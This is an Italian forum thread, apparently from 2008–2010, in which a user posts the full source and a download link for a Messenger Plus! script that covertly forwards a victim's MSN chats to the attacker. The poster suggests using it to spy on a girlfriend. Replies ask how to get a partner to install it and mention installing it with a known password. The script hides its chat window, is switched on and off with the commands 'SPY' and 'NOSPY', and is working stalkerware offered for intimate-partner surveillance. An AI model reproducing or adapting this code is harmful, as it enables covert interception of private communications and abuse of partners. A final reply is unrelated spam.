Spiare conversazioni MSN altrui!

« Older   Newer »
  Share  
PlayStation
view post Posted on 30/11/2008, 14:17




Ecco a voi uno script abbastanza utile per chi magari nn si fida della propria ragazza! Questo Script vi consente tramite un semplice comando(SPY) che scriverete nella conversazione della persona che volete spiare di ricevere tutti i suoi messaggi inviati e ricevuti! Però la vittima nn potrà parlarvi in quanto se potesse riceverà tutti i messaggi intercettati! Lo script è disattivabile quanto si vuole tramite un comando(NOSPY).

Qui c'è lo script gia compilato da me Download

E questo è il codice source:
SPOILER (click to view)
CODICE
var act = false;
var cht;
var org;
var nw = "";
var last = "";
function OnEvent_ChatWndReceiveMessage(ChatWnd, Origin, Message, MsgKind){
var e = new Enumerator(ChatWnd.Contacts);
var Cnt = e.item();
nw=Message;
if(act==true && ChatWnd!=cht && org.Status!=0 && nw!=last){//<---eliminate" && org.Status!=0" se volete ricevere i messaggi anke quando state in offline
   if(Origin==Messenger.MyName){
      cht.SendMessage("To: <"+Cnt.Email+">:\n-> "+Message);
   }else{
      cht.SendMessage("<"+Cnt.Email+"> :\n<- "+Message);
   }
  last=nw;
}
  if(Origin!=Messenger.MyName){
    if(Message=="SPY"){
      Interop.Call("User32.dll", "ShowWindow",ChatWnd.Handle, 0);
      act = true;
      cht = ChatWnd;
      org = Cnt;
      return Message="";
     }
     if(Message=="NOSPY"){
       act=false;
       var WM_CLOSE=0x10;
       Interop.Call("User32.dll", "PostMessageW", ChatWnd.Handle, WM_CLOSE, 0, 0);
       return Message="";
    }
  }
}
 
Top
Ery_t2
view post Posted on 31/12/2008, 12:50




non funziona o forse non ho capito ;allora ho installato lo script poi non ho capito se volessi spiare per es Maria nella sua conversazione devo scrivere : SPY o (SPY) ???
 
Top
PlayStation
view post Posted on 31/12/2008, 12:51




E no devi far installare lo script a maria, e dopo che l'ha installato nella sua conversazione scrivere SPY!
 
Top
Ery_t2
view post Posted on 1/1/2009, 21:06




ah ho capito :ph34r:
 
Top
TheBourne
view post Posted on 2/1/2009, 12:16




Funziona perchè io e PlayStation lo abbiamo provato.
 
Top
wufo
view post Posted on 3/3/2009, 21:02




ciao ragazzi..sono nuovo in questo forum e sono molto interessato a questo script...me lo sono salvato nel computer e lo farò installare alla mia morosa :D due cose però nn ho capito: quel codice lungo a cosa serve? lo devo utilizzare? una volta che ho scritto SPY nella sua conversazione io a lei appaio come ''non in linea''? grazie a tutti

PS: DITEMI SE PUò ESSERE UNA SOLUZIONE OPPURE NO..SICCOME IO CONOSCO LA PASSWORD DELLA MIA MOROSA POTREI ENTRARE CN IL SUO CONTT E INSTALLARLO??

Edited by wufo - 4/3/2009, 13:57
 
Top
thewall891
view post Posted on 29/7/2009, 15:50




sf
 
Top
NICO10/5/09
view post Posted on 9/1/2010, 13:49




non funziona!l ho installato sul suo e sul mio computer ma purtroppo non va!!AIUTATEMIII
 
Top
L0r3X
view post Posted on 1/5/2010, 20:47




Quando per esempio "Maria" va ad installare questo script, legge: Script per spiare le conversazioni di chi vuoi!
Non sospetterebbe qualcosa? :huh:
 
Top
kicscyday
view post Posted on 18/1/2017, 03:30




There is the ability to create one application that will run in both systems. T-mobile adopted it and it was more known as T-mobile G1. A professional app development company will never develop overtly flawed apps.
 
Top
9 replies since 30/11/2008, 14:17   17218 views
  Share